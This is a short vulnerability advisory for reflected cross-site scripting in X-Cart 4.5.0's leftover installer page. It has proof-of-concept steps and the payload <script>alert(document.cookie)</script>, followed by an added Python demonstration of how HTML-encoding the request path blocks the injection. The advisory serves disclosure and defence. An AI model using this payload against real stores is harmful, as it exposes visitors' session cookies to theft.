X-Cart 4.5.0 Cross Site Scripting

2015.07.01
Credit: nopesled
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: X-Cart Cross Site Scripting
# Date: 30/06/2015
# Exploit Author: nopesled
# Vendor Homepage: http://www.x-cart.com/
# Version: 4.5.0 and possibly earlier

Details
-------
Websites running X-Cart version 4.5.0 (and possibly earlier) that have not removed their /install/ directory are vulnerable to Cross Site Scripting via a GET request. The affected code is as follows:

<form method="post" name="ifrm" action="/install.php/" onsubmit="javascript: return step_next();">

Proof of Concept
----------------
1. Navigate to /install/
2. Append JavaScript payload (e.g. <script>alert(document.cookie)</script>)
3. Alert box appears containing cookie information
4. Analysis of page source reveals the following change:

<form method="post" name="ifrm" action="/install.php/"><script>alert(document.cookie)</script>" onsubmit="javascript: return step_next();">
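Added example (not part of the original advisory and not X-Cart code): a Python model of the form tag quoted above, rendered once with the request path copied in as-is and once HTML-encoded for attribute context, then parsed to show which tags a browser-style parser sees. It assumes the installer copies the request path into the action attribute without encoding, which is what the page-source change in step 4 suggests; the function names and the sample path are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Form tag as quoted in the advisory, with the action value templated.
FORM_TEMPLATE = ('<form method="post" name="ifrm" action="{action}" '
                 'onsubmit="javascript: return step_next();">')

# Constructed sample: the action value visible in the advisory's step 4 source.
SAMPLE_PATH = '/install.php/"><script>alert(document.cookie)</script>'


def render_unescaped(request_path):
    """Behaviour the advisory describes: path copied into the attribute as-is."""
    return FORM_TEMPLATE.format(action=request_path)


def render_escaped(request_path):
    """Hardened form: HTML-encode the path, quotes included, before output."""
    return FORM_TEMPLATE.format(action=escape(request_path, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag and the form's decoded action attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.form_action = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "form":
            self.form_action = dict(attrs).get("action")


def inspect(markup):
    """Return (start tags, form action) as an HTML parser interprets the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.form_action


if __name__ == "__main__":
    for render in (render_unescaped, render_escaped):
        tags, action = inspect(render(SAMPLE_PATH))
        print(f"{render.__name__}: tags={tags} action={action!r}")
```

With encoding applied, the parser sees a single form element whose action attribute holds the whole path as data; without it, the attribute ends at the injected quote and a separate script element appears.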

